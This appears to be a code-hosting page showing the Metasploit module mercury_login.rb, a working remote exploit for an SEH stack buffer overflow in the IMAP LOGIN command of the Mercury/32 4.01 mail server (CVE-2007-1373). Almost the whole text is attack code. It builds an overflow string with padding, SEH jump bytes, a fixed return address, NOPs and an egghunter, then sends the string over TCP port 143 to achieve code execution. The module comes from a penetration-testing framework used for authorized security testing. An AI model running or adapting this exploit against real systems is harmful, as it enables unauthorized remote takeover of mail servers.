CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/imap/mercury_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh10include Msf::Exploit::Remote::Egghunter1112def initialize(info = {})13super(update_info(info,14'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD17LOGIN verb. By sending a specially crafted login command, a buffer18is corrupted, and code execution is possible. This vulnerability was19discovered by (mu-b at digit-labs.org).20},21'Author' =>22[23'mu-b', # Discovery and exploit24'MC', # Metasploit module25'Ivan Racic' # Automatic targeting + egg hunter26],27'License' => MSF_LICENSE,28'References' =>29[30['CVE', '2007-1373'],31['EDB', '3418']32],33'Privileged' => true,34'DefaultOptions' =>35{36'EXITFUNC' => 'thread'37},38'Payload' =>39{40'BadChars' => "\x00\x0a\x0d\x20",41'Space' => 250042},43'Platform' => 'win',44'Targets' =>45[46['Windows Universal',47{48'Ret' => 0x0040146049}]50],51'DisclosureDate' => '2007-03-06',52'DefaultTarget' => 0))53register_options(54[55Opt::RPORT(143)56]57)58end5960def check61connect62resp = sock.get_once63disconnect64return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}65Exploit::CheckCode::Safe66end6768def exploit69hunter, egg = generate_egghunter(payload.encoded)70connect71sock.get_once72num = rand(255).to_i73sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"74sploit << rand_text_alpha_upper(347)75sploit << egg + payload.encoded76sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)77sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')78sploit << make_nops(20)79sploit << hunter80sock.put(sploit)81sock.get_once82print_status("Sending payload (#{sploit.length} bytes) ...")83handler84disconnect85end86end878889